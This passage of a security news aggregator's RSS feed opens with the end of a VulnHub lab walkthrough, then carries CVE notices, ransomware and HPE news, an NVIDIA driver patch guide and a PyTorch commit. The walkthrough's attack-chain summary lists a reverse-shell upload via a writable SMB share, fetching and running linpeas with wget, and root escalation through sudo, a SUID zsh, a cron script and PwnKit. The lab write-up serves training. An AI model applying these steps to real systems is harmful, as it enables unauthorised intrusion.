@whitecr0wz!</pre><pre>flag{3a3e52f0a6af0d6e36d7c5027c87f6e1}</pre><h3>Full Attack Chain</h3><pre>[Kali — 192.168.100.199]<br>         |<br>         | nmap -p- -sV -sC<br>         ↓<br>[dawn — 192.168.100.198]<br>  Port 80  → Apache 2.4.38 (no content)<br>  Port 445 → Samba (ITDEPT share)<br>         |<br>         | gobuster → /logs/management.log<br>         ↓<br>  Log reveals: cron executes ITDEPT/web-control every minute<br>         |<br>         | enum4linux → ITDEPT share: READ + WRITE (no auth)<br>         ↓<br>  Upload reverse shell as web-control → cron fires → www-data shell<br>         |<br>         | wget linpeas.sh → ./linpeas.sh<br>         ↓<br>  4 privesc vectors found:<br>    [1] sudo sudo /bin/bash           → root (1 command)<br>    [2] /usr/bin/zsh (SUID)           → root (1 command)<br>    [3] echo into web-control cron    → root (wait 60s)<br>    [4] ./PwnKit (CVE-2021-4034)      → root (1 command)<br>         |<br>         ↓<br>  ROOT — uid=0 — FULL COMPROMISE ✓</pre><h3>Key Takeaways</h3><p><strong>Reading logs before attacking:</strong> The /logs/management.log file told me exactly what the system was doing before I sent a single offensive request. Logs, readme files, and error messages often contain more actionable intelligence than any scanner output. Always enumerate web content thoroughly even when the homepage appears empty.</p><p><strong>The SMB + cron combination:</strong> Neither the writable SMB share nor the cron job is catastrophic in isolation. Together they form a trivially exploitable initial access path — no credentials, no CVE, no brute force required. This is a textbook example of how misconfigured services compound each other.</p><p><strong>Four paths, one machine:</strong> Finding four independent privilege escalation routes on a single system underscores an important principle: each vulnerability does not need to be critical on its own. Sudo misconfiguration, a SUID shell binary, a world-writable cron script, and an unpatched kernel component all coexisted here. Defence-in-depth means fixing all of them, not just the most obvious one.</p><p><strong>GLIBC compatibility matters:</strong> The first PwnKit attempt failed due to a version mismatch between the compiled exploit binary and the target’s C library. When a kernel/userspace exploit fails silently, always check the GLIBC version (ldd --version) and match the pre-compiled exploit accordingly before assuming the system is not vulnerable.</p><p><em>Shikhali Jamalzade — alisalive.exe — instagram<br></em> <em>GitHub: </em><a href="https://github.com/alisalive"><em>github.com/alisalive</em></a><em> · LinkedIn: </em><a href="https://linkedin.com/in/camalzads"><em>linkedin.com/in/camalzads</em></a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=db12d38d2e3b" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/vulnhub-sunset-dawn-full-walkthrough-db12d38d2e3b">VulnHub — sunset: dawn | Full Walkthrough</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[INC Ransomware Uses Double Extortion and Printer Ransom Notes to Pressure Victims]]></title>
<description><![CDATA[INC has matured from an emerging RaaS operation into one of 2026’s most active ransomware families, claiming more than 800 victims since 2023 and capitalizing on disruption among competitors to expand its affiliate base. The group’s recent campaigns demonstrate both…
Read more →
The post INC Rans...]]></description>
<link>https://tsecurity.de/de/3609707/it-security-nachrichten/inc-ransomware-uses-double-extortion-and-printer-ransom-notes-to-pressure-victims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609707/it-security-nachrichten/inc-ransomware-uses-double-extortion-and-printer-ransom-notes-to-pressure-victims/</guid>
<pubDate>Fri, 19 Jun 2026 10:23:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>INC has matured from an emerging RaaS operation into one of 2026’s most active ransomware families, claiming more than 800 victims since 2023 and capitalizing on disruption among competitors to expand its affiliate base. The group’s recent campaigns demonstrate both…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/inc-ransomware-uses-double-extortion-and-printer-ransom-notes-to-pressure-victims/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/inc-ransomware-uses-double-extortion-and-printer-ransom-notes-to-pressure-victims/">INC Ransomware Uses Double Extortion and Printer Ransom Notes to Pressure Victims</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[INC Ransomware Uses Double Extortion and Printer Ransom Notes to Pressure Victims]]></title>
<description><![CDATA[INC has matured from an emerging RaaS operation into one of 2026’s most active ransomware families, claiming more than 800 victims since 2023 and capitalizing on disruption among competitors to expand its affiliate base. The group’s recent campaigns demonstrate both incremental tooling refinement...]]></description>
<link>https://tsecurity.de/de/3609626/it-security-nachrichten/inc-ransomware-uses-double-extortion-and-printer-ransom-notes-to-pressure-victims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609626/it-security-nachrichten/inc-ransomware-uses-double-extortion-and-printer-ransom-notes-to-pressure-victims/</guid>
<pubDate>Fri, 19 Jun 2026 09:38:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>INC has matured from an emerging RaaS operation into one of 2026’s most active ransomware families, claiming more than 800 victims since 2023 and capitalizing on disruption among competitors to expand its affiliate base. The group’s recent campaigns demonstrate both incremental tooling refinement and novel pressure tactics: double extortion of stolen data combined with automated […]</p>
<p>The post <a href="https://gbhackers.com/inc-ransomware-uses-double-extortion/">INC Ransomware Uses Double Extortion and Printer Ransom Notes to Pressure Victims</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-37015 | Symantec Endpoint Detection and Response Appliance up to 4.6.x privilege escalation (EUVD-2022-39672)]]></title>
<description><![CDATA[A vulnerability was found in Symantec Endpoint Detection and Response Appliance up to 4.6.x and classified as problematic. This affects an unknown part. Such manipulation leads to privilege escalation.

This vulnerability is uniquely identified as CVE-2022-37015. The attack can only be initiated ...]]></description>
<link>https://tsecurity.de/de/3606614/sicherheitsluecken/cve-2022-37015-symantec-endpoint-detection-and-response-appliance-up-to-46x-privilege-escalation-euvd-2022-39672/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606614/sicherheitsluecken/cve-2022-37015-symantec-endpoint-detection-and-response-appliance-up-to-46x-privilege-escalation-euvd-2022-39672/</guid>
<pubDate>Thu, 18 Jun 2026 06:23:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/symantec:endpoint_detection_and_response_appliance">Symantec Endpoint Detection and Response Appliance up to 4.6.x</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This affects an unknown part. Such manipulation leads to privilege escalation.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2022-37015">CVE-2022-37015</a>. The attack can only be initiated within the local network. No exploit exists.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[HPE CTO Russo drills into data, orchestration, and observability for the agentic enterprise]]></title>
<description><![CDATA[HPE CTO Fidelma Russo took to the main stage at HPE Discover 2026 in Las Vegas to detail a set of product announcements focused on governing data, orchestrating infrastructure, and operating AI agents in production. Where CEO Antonio Neri’s day-one keynote covered the portfolio architecture acros...]]></description>
<link>https://tsecurity.de/de/3606155/it-security-nachrichten/hpe-cto-russo-drills-into-data-orchestration-and-observability-for-the-agentic-enterprise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606155/it-security-nachrichten/hpe-cto-russo-drills-into-data-orchestration-and-observability-for-the-agentic-enterprise/</guid>
<pubDate>Wed, 17 Jun 2026 23:23:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>HPE CTO Fidelma Russo took to the main stage at HPE Discover 2026 in Las Vegas to detail a set of product announcements focused on governing data, orchestrating infrastructure, and operating AI agents in production. Where CEO Antonio Neri’s <a href="https://www.networkworld.com/article/4185952/hpe-discover-neri-outlines-an-ai-architecture-built-for-agents.html">day-one keynote</a> covered the portfolio architecture across networking, compute, and storage, Russo’s session went deeper on the software and operations layer that sits on top of that infrastructure.</p>



<p>Russo framed all of it around a single operational shift: Enterprises have moved from static workflows and human decision-making to distributed intelligence operating across fragmented infrastructure. The products she announced address what it takes to govern and operate that intelligence once it is in production. Key announcements include:</p>



<ul class="wp-block-list">
<li>HPE Data Fabric 8.2 with agent-aware capabilities</li>



<li>HPE Morpheus 9 with federated multi-site management and integrated software-defined networking</li>



<li>HPE OpsRamp Operations Copilot for AI factory observability</li>



<li>New partnership with ServiceNow connecting GreenLake Intelligence with autonomous service delivery </li>
</ul>



<p>“The question is no longer whether AI will transform the enterprise,” Russo said. “The question is, how do we make that transformation secure, governed, scalable, and operational?”</p>



<h2 class="wp-block-heading">Data Fabric as the trusted layer for AI</h2>



<p>Russo reiterated the now-familiar mantra that every AI strategy requires a data strategy, but argued that in an agentic world, data becomes part of the operational engine, not just an input. Agentic AI, she said, doesn’t simply retrieve information once, it continuously accesses data throughout the lifecycle of a task. That puts pressure on organizations to make data discoverable, governed, secured, and accessible wherever those agents operate. </p>



<p>To help solve that challenge, Russo announced HPE Data Fabric 8.2, with agent-aware capabilities; an enhanced global data catalog; and an appliance option aimed at simplifying deployment and reducing time-to-value.</p>



<p>“Before AI can act on that data, data must be discoverable, it must be governed, it must be secured, and it must be accessible wherever those agents operate,” Russo said.</p>



<h2 class="wp-block-heading">HPE Morpheus 9: Central control plane for hybrid and AI infrastructure</h2>



<p>Russo also used her keynote to announce HPE Morpheus 9. Part of the new HPE CloudOps Software Suite, Morpheus handles runtime orchestration and automation for traditional virtualization, container platforms, and AI workloads. </p>



<p>With version 9, HPE is introducing Morpheus Central, a federated multi-site management layer delivered as a GreenLake cloud service, with an air‑gapped on‑premises option. Morpheus Central provides a single operational view across multiple Morpheus deployments spanning data centers, regions, and cloud providers. From one console, operators can see:</p>



<ul class="wp-block-list">
<li>Fleet health (healthy, warning, and critical appliances)</li>



<li>Software currency and version drift across sites</li>



<li>Cost and license utilization for the entire estate </li>
</ul>



<p>Morpheus 9 also adds integrated software-defined networking (SDN) based on Juniper technology, bringing policy, security, and micro‑segmentation into the same platform. HPE is pitching these capabilities as transforming Morpheus from a provisioning tool into a true enterprise control plane for hybrid infrastructure, including AI workloads.</p>



<p>“This is our most advanced platform for operating modern and traditional infrastructure, as well as AI workloads,” Russo said.</p>



<h2 class="wp-block-heading">Distributed agentic enterprises</h2>



<p>HPE is extending its AI strategy beyond infrastructure into daily IT operations with an expansion of HPE GreenLake Intelligence, built around an agentic mesh and a growing family of copilots. At the core is a centralized agent registry and planning service that assigns identity, governance, and policy controls to AI agents, then coordinates which specialized agents should work together to deliver a requested outcome. </p>



<p>“Intelligence, which is usually trapped in products, has to move across and beyond individual products,” Russo said.</p>



<p>On top of this framework, HPE is rolling out multiple copilots aimed at making complex hybrid environments more manageable. A compute copilot is designed to help teams operate server infrastructure more intelligently, while a Morpheus orchestration copilot lets operators automate infrastructure using natural language. The flagship for observability is the OpsRamp Operations Copilot, which sits on GreenLake Intelligence and lets operators interact with their environment conversationally instead of hunting through dashboards, tickets, and logs. It uses frontier-scale models to reason across signals from infrastructure, applications, networks, AI services, and operations tools, surfacing related incidents, context, and recommended remediation in a single conversational view.</p>



<p>“Data powers intelligence, intelligence powers AI, and intelligence helps us operate it all,” Russo said. “We are now entering an era where people, systems, and agents are working together at a scale we’ve never seen before, and to do that successfully, organizations need three things: a trusted data layer, a platform for an agentic era, and intelligence embedded in day-to-day operations.”</p>



<h3 class="wp-block-heading">Read more from HPE Discover 2026</h3>



<ul class="wp-block-list">
<li><a href="https://www.networkworld.com/article/4185952/hpe-discover-neri-outlines-an-ai-architecture-built-for-agents.html">HPE CEO Neri outlines an AI architecture built for agents</a></li>



<li><a href="https://www.networkworld.com/article/4185763/hpe-product-barrage-targets-ai-networks-agents-management.html">HPE product barrage targets AI networks, agents, management</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-20246 | Cisco Umbrella Insights Virtual Appliance up to 3.8.3 privileges management (cisco-sa-umbrella-priv-esc-F4wJB7AU / EUVD-2026-37751)]]></title>
<description><![CDATA[A vulnerability was found in Cisco Umbrella Insights Virtual Appliance. It has been classified as critical. Impacted is an unknown function. Performing a manipulation results in improper privilege management.

This vulnerability is cataloged as CVE-2026-20246. The attack must be initiated from a ...]]></description>
<link>https://tsecurity.de/de/3605859/sicherheitsluecken/cve-2026-20246-cisco-umbrella-insights-virtual-appliance-up-to-383-privileges-management-cisco-sa-umbrella-priv-esc-f4wjb7au-euvd-2026-37751/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605859/sicherheitsluecken/cve-2026-20246-cisco-umbrella-insights-virtual-appliance-up-to-383-privileges-management-cisco-sa-umbrella-priv-esc-f4wjb7au-euvd-2026-37751/</guid>
<pubDate>Wed, 17 Jun 2026 20:53:14 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/cisco:umbrella_insights_virtual_appliance">Cisco Umbrella Insights Virtual Appliance</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. Impacted is an unknown function. Performing a manipulation results in improper privilege management.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-20246">CVE-2026-20246</a>. The attack must be initiated from a local position. There is no exploit available.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[Thermal Master P3 &amp; Thor im Test: Diese Wärmebildkameras überraschen mit Preis und Vielseitigkeit]]></title>
<description><![CDATA[Wärmebildkameras spüren nicht nur Schwächen bei der Wärmedämmung auf. Sie sind vielseitige Helfer im Alltag - und nicht mehr teuer. Unser Test zeigt, wer welches Modell braucht.
																					Dieser Artikel wurde einsortiert unter 
																	Technology,																	Smart Home.]]></description>
<link>https://tsecurity.de/de/3605630/it-nachrichten/thermal-master-p3-amp-thor-im-test-diese-waermebildkameras-ueberraschen-mit-preis-und-vielseitigkeit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605630/it-nachrichten/thermal-master-p3-amp-thor-im-test-diese-waermebildkameras-ueberraschen-mit-preis-und-vielseitigkeit/</guid>
<pubDate>Wed, 17 Jun 2026 19:18:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wärmebildkameras spüren nicht nur Schwächen bei der Wärmedämmung auf. Sie sind vielseitige Helfer im Alltag - und nicht mehr teuer. Unser Test zeigt, wer welches Modell braucht.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/technology/index.html">Technology</a>,																	<a href="https://www.netzwelt.de/smarthome/index.html">Smart Home</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA['Quirky design, unbeatable speed and quality': Bambu Lab's 5-star 3D printer for beginners just dropped to an unmissable price in the 4th anniversary sale]]></title>
<description><![CDATA[The fast and accurate A1 Mini is our Editor's Choice, setting a new bar for entry-level 3D printing.]]></description>
<link>https://tsecurity.de/de/3604600/it-nachrichten/quirky-design-unbeatable-speed-and-quality-bambu-labs-5-star-3d-printer-for-beginners-just-dropped-to-an-unmissable-price-in-the-4th-anniversary-sale/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604600/it-nachrichten/quirky-design-unbeatable-speed-and-quality-bambu-labs-5-star-3d-printer-for-beginners-just-dropped-to-an-unmissable-price-in-the-4th-anniversary-sale/</guid>
<pubDate>Wed, 17 Jun 2026 13:33:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The fast and accurate A1 Mini is our Editor's Choice, setting a new bar for entry-level 3D printing.]]></content:encoded>
</item>
<item>
<title><![CDATA[[Guide/RFC] Fixing NVIDIA 550/580 DKMS Compilation on Kernel 7.0+ (VMA API Breakage) & Wayland USB-C D3cold Panics]]></title>
<description><![CDATA[Hey everyone, I recently hit a massive brick wall on Debian Sid/Testing when my kernel updated to 7.0+. My NVIDIA driver (550.163) completely failed to compile via DKMS, and to make matters worse, trying to hotplug my external USB-C monitor on Wayland caused my GPU to panic and the laptop fans to...]]></description>
<link>https://tsecurity.de/de/3604363/linux-tipps/guiderfc-fixing-nvidia-550580-dkms-compilation-on-kernel-70-vma-api-breakage-wayland-usb-c-d3cold-panics/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604363/linux-tipps/guiderfc-fixing-nvidia-550580-dkms-compilation-on-kernel-70-vma-api-breakage-wayland-usb-c-d3cold-panics/</guid>
<pubDate>Wed, 17 Jun 2026 12:10:20 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hey everyone,</p> <p>I recently hit a massive brick wall on Debian Sid/Testing when my kernel updated to 7.0+. My NVIDIA driver (550.163) completely failed to compile via DKMS, and to make matters worse, trying to hotplug my external USB-C monitor on Wayland caused my GPU to panic and the laptop fans to instantly ramp up to 100%.</p> <p>Since official support for 7.0+ RC/testing kernels isn't fully here yet, I did a deep dive into the kernel source and the ACPI power states to figure out exactly what broke and how to bypass it.</p> <p>I've documented the full architectural breakdown and provided a C-patch in a Gist, but here is the TL;DR:</p> <h1>1. The Kernel 7.0+ DKMS Breakage</h1> <p>Linux 7.0 completely refactored the VMA locking API. They purged the <code>VMA_LOCK_OFFSET</code> macro from <code>include/linux/mm_types.h</code> and changed the signature of <code>__is_vma_write_locked()</code> from 2 arguments to 1. The NVIDIA proprietary driver source (specifically <code>nv-mmap.c</code>) still tries to use the old API, causing GCC to abort.</p> <p><strong>The Fix:</strong> I wrote a forward-compatibility patch using <code>#if LINUX_VERSION_CODE &gt;= KERNEL_VERSION(7, 0, 0)</code> to provide a synthetic <code>VMA_LOCK_OFFSET</code> and route the lock checks through <code>__vma_raw_mm_seqnum()</code>.</p> <h1>2. The Wayland USB-C / D3cold Panic</h1> <p>In hybrid Optimus laptops, the USB-C DP alt-mode is physically wired to the NVIDIA dGPU. When your Wayland compositor (Niri, Sway, etc.) routes rendering through the AMD iGPU for power saving, the NVIDIA GPU enters <code>D3cold</code> (deep sleep). When you hotplug a monitor, the GPU wakes up, but Wayland never establishes an EGL context for it. The GPU panics, and the firmware maxes out the fans to prevent thermal damage.</p> <p><strong>The Fix:</strong> You have to force the GPU to maintain state and provide a legacy framebuffer.</p> <ul> <li>GRUB: <code>nvidia-drm.modeset=1 nvidia_drm.fbdev=1</code></li> <li>Modprobe (<code>/etc/modprobe.d/nvidia-pm.conf</code>): <code>options nvidia NVreg_DynamicPowerManagement=0x02</code></li> </ul> <h1>The Patch &amp; Full Guide</h1> <p>If you are currently stuck on Kernel 7.0+ and need to get your DKMS building again, you can grab the <code>.patch</code> file and the auto-patching instructions for <code>dkms.conf</code> here:</p> <p><a href="https://gist.github.com/louzt/1c85044d5090d19223c3f5edf426a19e"><strong>https://gist.github.com/louzt/1c85044d5090d19223c3f5edf426a19e</strong></a></p> <p><em>Disclaimer: I am currently pinned to kernel 6.19.14 for work stability, so I am publishing this patch as an RFC (Request for Comments) based on forensic analysis. If you are on 7.0+ and apply the patch, please share your build logs in the Gist comments!</em></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Mrlou_st"> /u/Mrlou_st </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1u85s74/guiderfc_fixing_nvidia_550580_dkms_compilation_on/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1u85s74/guiderfc_fixing_nvidia_550580_dkms_compilation_on/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-38487 | Dell EMC VxRail Appliance up to 7.0.519 privileges management (dsa-2024-247 / EUVD-2024-55624)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in Dell EMC VxRail Appliance up to 7.0.519. This affects an unknown part. Executing a manipulation can lead to improper privilege management.

This vulnerability is tracked as CVE-2024-38487. The attack is restricted to local execution. No...]]></description>
<link>https://tsecurity.de/de/3603010/sicherheitsluecken/cve-2024-38487-dell-emc-vxrail-appliance-up-to-70519-privileges-management-dsa-2024-247-euvd-2024-55624/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603010/sicherheitsluecken/cve-2024-38487-dell-emc-vxrail-appliance-up-to-70519-privileges-management-dsa-2024-247-euvd-2024-55624/</guid>
<pubDate>Tue, 16 Jun 2026 21:38:42 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/dell:emc_vxrail_appliance">Dell EMC VxRail Appliance up to 7.0.519</a>. This affects an unknown part. Executing a manipulation can lead to improper privilege management.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2024-38487">CVE-2024-38487</a>. The attack is restricted to local execution. No exploit exists.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[My favorite air fryer proves you don’t need to spend loads to get great results — and it's on sale for under $70 ahead of Amazon Prime Day]]></title>
<description><![CDATA[The Instant Vortex Plus air fryer is my favorite kitchen appliance, and it's less than $70 in Amazon's early Prime Day sale.]]></description>
<link>https://tsecurity.de/de/3602543/it-nachrichten/my-favorite-air-fryer-proves-you-dont-need-to-spend-loads-to-get-great-results-and-its-on-sale-for-under-70-ahead-of-amazon-prime-day/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3602543/it-nachrichten/my-favorite-air-fryer-proves-you-dont-need-to-spend-loads-to-get-great-results-and-its-on-sale-for-under-70-ahead-of-amazon-prime-day/</guid>
<pubDate>Tue, 16 Jun 2026 18:32:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Instant Vortex Plus air fryer is my favorite kitchen appliance, and it's less than $70 in Amazon's early Prime Day sale.]]></content:encoded>
</item>
<item>
<title><![CDATA[Thermal Grizzliy's New DeltaMate CPU Block MPII Is Gorgeous and Priced For 2026]]></title>
<description><![CDATA[Meaning anyone who wants anything nice needs to pay through the nose for it.]]></description>
<link>https://tsecurity.de/de/3601596/it-nachrichten/thermal-grizzliys-new-deltamate-cpu-block-mpii-is-gorgeous-and-priced-for-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601596/it-nachrichten/thermal-grizzliys-new-deltamate-cpu-block-mpii-is-gorgeous-and-priced-for-2026/</guid>
<pubDate>Tue, 16 Jun 2026 13:17:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Meaning anyone who wants anything nice needs to pay through the nose for it.]]></content:encoded>
</item>
<item>
<title><![CDATA[trunk/8414e35518f93e2b48ebc594de2faba51dbeca83: Preserve signed zero in FX complex codegen (#185550)]]></title>
<description><![CDATA[FX codegen used complex.repr when rendering complex constants into generated Python source. CPython can print zero-component values such as (-0-1e-28j), -1e-28j, or (1-0j), and parsing that source can flip the sign of a zero component. Dynamo exposes this when it traces a tensor constant containi...]]></description>
<link>https://tsecurity.de/de/3599609/downloads/trunk8414e35518f93e2b48ebc594de2faba51dbeca83-preserve-signed-zero-in-fx-complex-codegen-185550/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599609/downloads/trunk8414e35518f93e2b48ebc594de2faba51dbeca83-preserve-signed-zero-in-fx-complex-codegen-185550/</guid>
<pubDate>Mon, 15 Jun 2026 17:48:00 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>FX codegen used complex.<strong>repr</strong> when rendering complex constants into generated Python source. CPython can print zero-component values such as (-0-1e-28j), -1e-28j, or (1-0j), and parsing that source can flip the sign of a zero component. Dynamo exposes this when it traces a tensor constant containing -1e-28j through FX: the generated GraphModule reconstructs a value with the wrong signed zero, changing tensor repr and the sign of the zero imaginary result from cos().</p>
<p>Render complex constants with a zero real or imaginary component as complex(real, imag) through the existing recursive argument printer. Float repr preserves -0.0, so those generated constants round-trip signed zero components. Nonzero complex constants keep the existing repr() path to avoid changing the common codegen case.</p>
<p>Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3074795345" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/153852" data-hovercard-type="issue" data-hovercard-url="/pytorch/pytorch/issues/153852/hovercard" href="https://github.com/pytorch/pytorch/issues/153852">#153852</a></p>
<p>Generated by my agent</p>
<p>Benchmark Results:</p>
<ul>
<li>
<p>FX GraphModule construction with 1000 zero-component complex constants, 80 iterations x 7 repeats, median: main 3.55 ms/graph; this diff 6.77 ms/graph. This is the affected correctness path that now emits complex(real, imag) to preserve signed zero.</p>
</li>
<li>
<p>FX GraphModule construction with 1000 nonzero complex constants, same command shape, median: main 4.29 ms/graph; this diff 3.90 ms/graph. Nonzero constants remain on the existing repr() path; the difference is measurement noise.</p>
</li>
</ul>
<p>Test Plan:</p>
<ul>
<li>
<p>python test/dynamo/test_repros.py ReproTests.test_compile_complex_tensor_constant_signed_zero</p>
</li>
<li>
<p>python test/test_fx.py TestFX.test_complex_constant_codegen_preserves_signed_zero (direct run blocked locally before target test by unrelated torchvision::nms registration failure)</p>
</li>
<li>
<p>targeted TestFX.test_complex_constant_codegen_preserves_signed_zero via a torchvision import stub</p>
</li>
<li>
<p>lintrunner -a</p>
</li>
<li>
<p>git diff --check</p>
</li>
</ul>
<p>Pull Request resolved: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542863124" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/185550" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/185550/hovercard" href="https://github.com/pytorch/pytorch/pull/185550">#185550</a><br>
Approved by: <a href="https://github.com/desertfire">https://github.com/desertfire</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Beyond the Score: Using AI to Translate CVEs into Real-World Business Risk]]></title>
<description><![CDATA[Security leaders rarely struggle to gather data, but they often struggle to turn that data into something clear and meaningful for the business. In a typical week, a CISO might receive a report listing hundreds or even thousands of vulnerabilities, most of them accompanied by CVSS scores that mak...]]></description>
<link>https://tsecurity.de/de/3599546/it-security-nachrichten/beyond-the-score-using-ai-to-translate-cves-into-real-world-business-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599546/it-security-nachrichten/beyond-the-score-using-ai-to-translate-cves-into-real-world-business-risk/</guid>
<pubDate>Mon, 15 Jun 2026 17:25:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>Security leaders rarely struggle to gather data, but they often struggle to turn that data into something clear and meaningful for the business. In a typical week, a CISO might receive a report listing hundreds or even thousands of vulnerabilities, most of them accompanied by CVSS scores that make the entire list look urgent, while also managing the wider set of operational, regulatory, and strategic demands that already come with the role.</span></p><p><span>That difficulty becomes more obvious when the same information has to be carried into the boardroom, where the questions are rarely about CVE IDs or exploit counts in isolation. What leadership wants to understand is whether the organization’s revenue, uptime, legal exposure, or broader resilience could be affected, and how quickly those risks need to be addressed.</span></p><p><span>This is where many security programs lose momentum, because the technical view of severity does not always line up neatly with the business view of consequence. Bridging that gap has traditionally been slow, manual work, which is one reason AI is starting to matter more in vulnerability management: it can help translate technical findings into business context that is clearer, faster to act on, and easier for leadership to understand.</span></p><h2>Why CVSS alone does not reflect real-world business risk</h2><p><span>For years, the industry has relied on CVSS as a quick way to judge urgency, and while the framework does account for factors such as attack vector, attack complexity, and other attack requirements, the score is still calculated in isolation and often misses the conditions that shape real risk inside an organization. A CVSS 9.8 vulnerability affecting a legacy printer in a segmented branch office may look critical on paper, but it is unlikely to carry the same business impact as a 7.5 vulnerability affecting an internet-facing database that holds sensitive customer data.</span></p><p><span>One of the long-standing weaknesses of static scoring is that it tells you how severe a flaw may be in theory, but not how much disruption it could cause in your own environment, how exposed the affected asset is, or how closely it is tied to a revenue-generating or business-critical process. That is where AI becomes more useful, because it can add the missing context that helps security teams judge not just how serious a vulnerability looks, but how much it matters in practice.</span></p><p><span>Machine learning models can now process a much broader set of inputs, including attacker activity, exploit availability, internal network topology, and the business value attached to the asset or process involved. Rather than leaving teams with a static queue of scores, that creates a live view of risk shaped by reachability, exposure, and business consequence, making it easier to separate technical severity from actual organizational risk.</span></p><h2>How AI helps connect vulnerabilities to business impact</h2><p><span>One of the more practical ways AI can improve vulnerability management is by helping security teams connect technical findings to the parts of the business they actually affect. A vulnerability tied to an obscure IP address may not mean much on its own, but the picture changes quickly when that asset is identified as part of a regional payment system, a customer-facing portal, or a supply chain application the business depends on. That kind of asset attribution has traditionally taken time, context, and manual investigation. AI can help shorten that process by linking technical findings to business function much more quickly.</span></p><p><span>Instead of relying only on severity scores or yesterday’s alerts, AI can weigh a broader set of signals, including exploit activity, attacker behavior, asset exposure, and internal topology, which gives security teams a more grounded way to judge where risk is most likely to become operationally significant. The benefit is not simply speed, but a clearer picture of which vulnerabilities are most likely to affect revenue, uptime, or business continuity if they are left unresolved.</span></p><p><span>At the leadership level, this same approach can help turn a large volume of technical output into something more usable. Rather than forcing CISOs to manually translate thousands of low-level alerts into board-facing language, AI can support that reporting by summarizing likely business impact, 